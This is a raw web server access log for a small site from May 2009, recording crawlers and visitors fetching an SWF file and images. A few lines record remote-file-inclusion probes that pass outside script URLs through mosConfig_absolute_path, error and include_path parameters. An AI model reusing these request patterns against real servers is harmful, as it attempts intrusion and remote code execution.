194.160.239.135 - - [19/May/2009:21:46:29 +0100] "GET /index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.ecf.cl/portal/cache/rss40.xml?? HTTP/1.1" 404 356 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" 341 602
84.108.17.206 - - [19/May/2009:21:58:27 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs03.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__NbaQgliO4WhAC5cnw7H-05d17n0=&h=340&w=605&sz=134&hl=iw&start=40&um=1&tbnid=KQhCjh2qaPof1M:&tbnh=76&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 962 7503735
84.108.17.206 - - [19/May/2009:21:59:38 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/ob3.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__THYXJqUHiXp7HyxvZWXqUfv104E=&h=365&w=602&sz=71&hl=iw&start=42&um=1&tbnid=oGfKt73JmutM8M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 960 7503734
84.108.17.206 - - [19/May/2009:22:00:32 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/hs04.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__MW5Eoi54bX8k4ZQ7D0sz8WoCpFE=&h=365&w=604&sz=70&hl=iw&start=44&um=1&tbnid=cYlYden7o-li7M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 961 7503734
84.108.17.206 - - [19/May/2009:22:01:41 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs02.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__Q_pkbXTDSiOZwyDF4pBExHENA28=&h=340&w=605&sz=189&hl=iw&start=46&um=1&tbnid=ajRcraqg3eVA3M:&tbnh=76&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 962 7503734
84.108.17.206 - - [19/May/2009:21:58:29 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/hs01.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__CFUUqUcswqr99_0kluiVa1cN0c0=&h=365&w=603&sz=58&hl=iw&start=41&um=1&tbnid=C8H5ZS2tD_DR-M:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 961 67160
84.108.17.206 - - [19/May/2009:22:02:48 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs12.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__xeJIiLo1pCB_B4rfE-HybtwL2Dg=&h=340&w=604&sz=137&hl=iw&start=47&um=1&tbnid=pRpIDKCTfuMyZM:&tbnh=76&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 962 7503734
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs11.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__zcLLv1fkP_zb8gtUZRWZxLkPJNw=&h=363&w=602&sz=28&hl=iw&start=55&um=1&tbnid=UYK7Le5tUTxU_M:&tbnh=81&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 1056 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://images.google.com/imgres?imgurl=http://www.decodeine.com/hs06.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__58OUUrz_hT-2V_KBUSEBTfXk664=&h=365&w=494&sz=76&hl=iw&start=56&um=1&tbnid=u6ajcLhkYznCiM:&tbnh=96&tbnw=130&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 1056 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:53 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:54 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:03:58 +0100] "GET /bs11.jpg HTTP/1.1" 200 28480 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs11.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__zcLLv1fkP_zb8gtUZRWZxLkPJNw=&h=363&w=602&sz=28&hl=iw&start=55&um=1&tbnid=UYK7Le5tUTxU_M:&tbnh=81&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 960 28841
84.108.17.206 - - [19/May/2009:22:04:02 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://images.google.com/imgres?imgurl=http://www.decodeine.com/bs11.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__zcLLv1fkP_zb8gtUZRWZxLkPJNw=&h=363&w=602&sz=28&hl=iw&start=55&um=1&tbnid=UYK7Le5tUTxU_M:&tbnh=81&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D54%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 1056 256
84.108.17.206 - - [19/May/2009:22:04:02 +0100] "GET /dec4b.swf HTTP/1.1" 304 - "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 489 256
84.108.17.206 - - [19/May/2009:22:04:27 +0100] "GET /hs05.jpg HTTP/1.1" 200 29807 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/hs05.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__b54hj7qt1FzAkDORn1wQExizDKk=&h=365&w=602&sz=30&hl=iw&start=52&um=1&tbnid=Lwfu6KeDn0z4IM:&tbnh=82&tbnw=135&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D36%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 960 30169
84.108.17.206 - - [19/May/2009:22:04:38 +0100] "GET /eh2.jpg HTTP/1.1" 200 65677 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 421 66040
84.108.17.206 - - [19/May/2009:22:04:39 +0100] "GET /eh3.jpg HTTP/1.1" 200 65131 "http://www.decodeine.com/eh2.jpg" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 419 65493
84.108.17.206 - - [19/May/2009:22:04:42 +0100] "GET /eha1.jpg HTTP/1.1" 404 355 "http://www.decodeine.com/dec4b.swf" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 422 639
84.108.17.206 - - [19/May/2009:22:42:49 +0100] "GET /dec4b.swf HTTP/1.1" 206 7500815 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o3.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__YkHKhk74QcQ_3eqInqpDcuCt1LI=&h=219&w=698&sz=150&hl=iw&start=126&um=1&tbnid=VrgEk9vRJYytdM:&tbnh=44&tbnw=139&prev=/images%3Fq%3Dexploded%2Baxonometry%2Bzaha%26ndsp%3D18%26hl%3Diw%26rls%3Dcom.microsoft:he:IE-SearchBox%26sa%3DN%26start%3D108%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.0.04506.30; InfoPath.1; .NET CLR 3.0.04506.648)" 1075 2225040
219.234.81.33 - - [20/May/2009:02:50:39 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Avant Browser; InfoPath.1; .NET CLR 2.0.50727; .NET CLR1.1.4322)" 376 1587
219.234.81.33 - - [20/May/2009:02:50:42 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "-" 73 584
124.115.0.23 - - [20/May/2009:03:28:22 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
74.6.17.154 - - [20/May/2009:03:38:03 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [20/May/2009:03:38:05 +0100] "GET /feidad.html HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 468 216
91.184.52.10 - - [20/May/2009:06:16:17 +0100] "GET /log//errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 362 "-" "Mozilla/5.0" 177 608
91.184.52.10 - - [20/May/2009:06:16:17 +0100] "GET //errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0" 173 603
91.184.52.10 - - [20/May/2009:06:16:17 +0100] "GET //errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 357 "-" "Mozilla/5.0" 173 603
91.184.52.10 - - [20/May/2009:06:16:17 +0100] "GET /log//errors.php?error=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 362 "-" "Mozilla/5.0" 177 608
216.129.119.14 - - [20/May/2009:07:09:02 +0100] "GET /webalizer/usage_200811.html HTTP/1.0" 200 152400 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 152725
66.249.71.144 - - [20/May/2009:07:25:12 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [20/May/2009:07:25:12 +0100] "GET /webalizer/usage_200901.html HTTP/1.1" 200 158400 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 158763
66.249.71.144 - - [20/May/2009:11:05:10 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 122644 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 123008
193.47.80.50 - - [20/May/2009:11:37:04 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 260 603
193.47.80.50 - - [20/May/2009:11:37:04 +0100] "GET / HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" 342 216
216.129.119.14 - - [20/May/2009:12:18:18 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
216.129.119.14 - - [20/May/2009:13:13:24 +0100] "GET /webalizer/usage_200902.html HTTP/1.0" 200 152884 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 153209
216.129.119.14 - - [20/May/2009:13:16:14 +0100] "GET /webalizer/usage_200812.html HTTP/1.0" 200 153211 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 153536
91.205.124.11 - - [20/May/2009:13:45:05 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 344 584
91.205.124.11 - - [20/May/2009:13:45:06 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yanga WorldSearch Bot v1.1/beta (http://www.yanga.co.uk/)" 334 1568
66.249.71.144 - - [20/May/2009:13:52:10 +0100] "GET / HTTP/1.1" 200 1266 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 231 1625
216.129.119.14 - - [20/May/2009:16:15:39 +0100] "GET /webalizer/usage_200807.html HTTP/1.0" 200 151253 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 216 151579
72.29.233.165 - - [20/May/2009:16:56:54 +0100] "GET / HTTP/1.1" 200 1266 "-" "dragonfly(ebingbong#playstarmusic.com)" 264 1568
130.216.1.16 - - [20/May/2009:22:26:02 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=8&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bof%2Ba%2Bpod%26ndsp%3D21%26hl%3Den%26rls%3Dcom.microsoft:en-nz%26rlz%3D1I7GPEA_en%26sa%3DN%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1119 563617
130.216.1.16 - - [20/May/2009:22:27:16 +0100] "GET /o6.jpg HTTP/1.0" 200 70616 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=8&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bof%2Ba%2Bpod%26ndsp%3D21%26hl%3Den%26rls%3Dcom.microsoft:en-nz%26rlz%3D1I7GPEA_en%26sa%3DN%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1116 70980
130.216.1.16 - - [20/May/2009:22:27:31 +0100] "GET /favicon.ico HTTP/1.0" 404 358 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 448 641
130.216.1.16 - - [20/May/2009:22:30:40 +0100] "GET /dec4b.swf HTTP/1.0" 200 7503350 "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=8&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bof%2Ba%2Bpod%26ndsp%3D21%26hl%3Den%26rls%3Dcom.microsoft:en-nz%26rlz%3D1I7GPEA_en%26sa%3DN%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1119 1122200
130.216.1.16 - - [20/May/2009:22:32:54 +0100] "GET /o6.jpg HTTP/1.0" 304 - "http://images.google.com/imgres?imgurl=http://www.decodeine.com/o6.jpg&imgrefurl=http://www.decodeine.com/dec4b.swf&usg=__aQLah73Q_18Eog2LWBRuSYk9A3o=&h=330&w=440&sz=69&hl=en&start=8&um=1&tbnid=z-lO-Jro2AjC8M:&tbnh=95&tbnw=127&prev=/images%3Fq%3Dexploded%2Baxonometric%2Bof%2Ba%2Bpod%26ndsp%3D21%26hl%3Den%26rls%3Dcom.microsoft:en-nz%26rlz%3D1I7GPEA_en%26sa%3DN%26um%3D1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; InfoPath.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" 1180 283
77.88.26.26 - - [21/May/2009:01:50:24 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Yandex/1.01.001 (compatible; Win16; I)" 155 641
77.88.26.26 - - [21/May/2009:01:50:24 +0100] "GET / HTTP/1.1" 200 1266 "-" "Yandex/1.01.001 (compatible; Win16; I)" 450 1624
124.115.4.194 - - [21/May/2009:02:28:00 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
124.115.1.7 - - [21/May/2009:05:01:46 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [21/May/2009:05:15:24 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [21/May/2009:05:16:37 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [21/May/2009:05:32:26 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [21/May/2009:05:32:31 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
74.6.17.154 - - [21/May/2009:08:02:58 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" 194 603
74.6.17.154 - - [21/May/2009:08:02:58 +0100] "GET /log/error.log.1 HTTP/1.0" 200 4068 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" 380 4390
119.63.193.63 - - [21/May/2009:08:29:02 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Baiduspider+(+http://www.baidu.jp/spider/)" 164 603
216.129.119.14 - - [21/May/2009:10:44:15 +0100] "GET / HTTP/1.0" 200 1266 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 189 1587
66.249.71.144 - - [21/May/2009:11:04:24 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 258 641
66.249.71.144 - - [21/May/2009:11:04:24 +0100] "GET /webalizer/usage_200905.html HTTP/1.1" 200 125485 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 353 125848
216.129.119.14 - - [21/May/2009:11:32:11 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" 199 603
58.61.164.141 - - [21/May/2009:12:51:05 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [21/May/2009:12:53:21 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
66.249.71.144 - - [21/May/2009:13:17:26 +0100] "GET /log/web.log.4 HTTP/1.1" 304 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 294 255
114.80.93.71 - - [21/May/2009:16:00:38 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
220.181.61.234 - - [21/May/2009:17:56:59 +0100] "GET / HTTP/1.1" 200 1266 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" 275 1587
201.81.171.135 - - [21/May/2009:18:02:05 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
201.81.171.135 - - [21/May/2009:18:16:37 +0100] "GET /dec4b.swf HTTP/1.1" 200 7503350 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727)" 281 7503697
58.61.164.207 - - [21/May/2009:19:08:01 +0100] "GET /robots.txt HTTP/1.1" 404 357 "http://www.decodeine.com/robots.txt" "Sosospider+(+http://help.soso.com/webspider.htm)" 263 641
218.186.13.227 - - [21/May/2009:20:49:24 +0100] "GET /robots.txt HTTP/1.0" 404 357 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 158 603
218.186.13.227 - - [21/May/2009:20:49:25 +0100] "GET / HTTP/1.0" 200 1266 "-" "nutch.us/Nutch-1.0 (www.nutch.us; crawler@nutch.us)" 148 1587
147.175.16.111 - - [22/May/2009:00:41:17 +0100] "GET /frame0.jpg HTTP/1.1" 200 61916 "-" "-" 66 62221
65.55.106.216 - - [22/May/2009:01:10:12 +0100] "GET /robots.txt HTTP/1.1" 404 357 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 194 641
65.55.106.216 - - [22/May/2009:01:11:29 +0100] "GET / HTTP/1.1" 200 1266 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" 216 1625
124.115.0.22 - - [22/May/2009:01:30:09 +0100] "HEAD / HTTP/1.1" 200 - "http://www.decodeine.com/" "Sosospider+(+http://help.soso.com/webspider.htm)" 244 359
91.121.210.42 - - [22/May/2009:02:57:39 +0100] "GET ///admin.php?include_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 356 "-" "Mozilla/5.0" 224 602
91.121.210.42 - - [22/May/2009:02:57:39 +0100] "GET /log///admin.php?include_path=http://www.horsesensetv.com/content//administrator/components/com_virtuemart/v7.txt? HTTP/1.1" 404 362 "-" "Mozilla/5.0" 228 608
124.115.1.7 - - [22/May/2009:03:32:15 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.141 - - [22/May/2009:03:36:48 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
124.115.1.8 - - [22/May/2009:03:44:21 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.139 - - [22/May/2009:03:44:44 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
58.61.164.140 - - [22/May/2009:04:02:33 +0100] "GET / HTTP/1.1" 200 1266 "http://www.decodeine.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" 245 1625
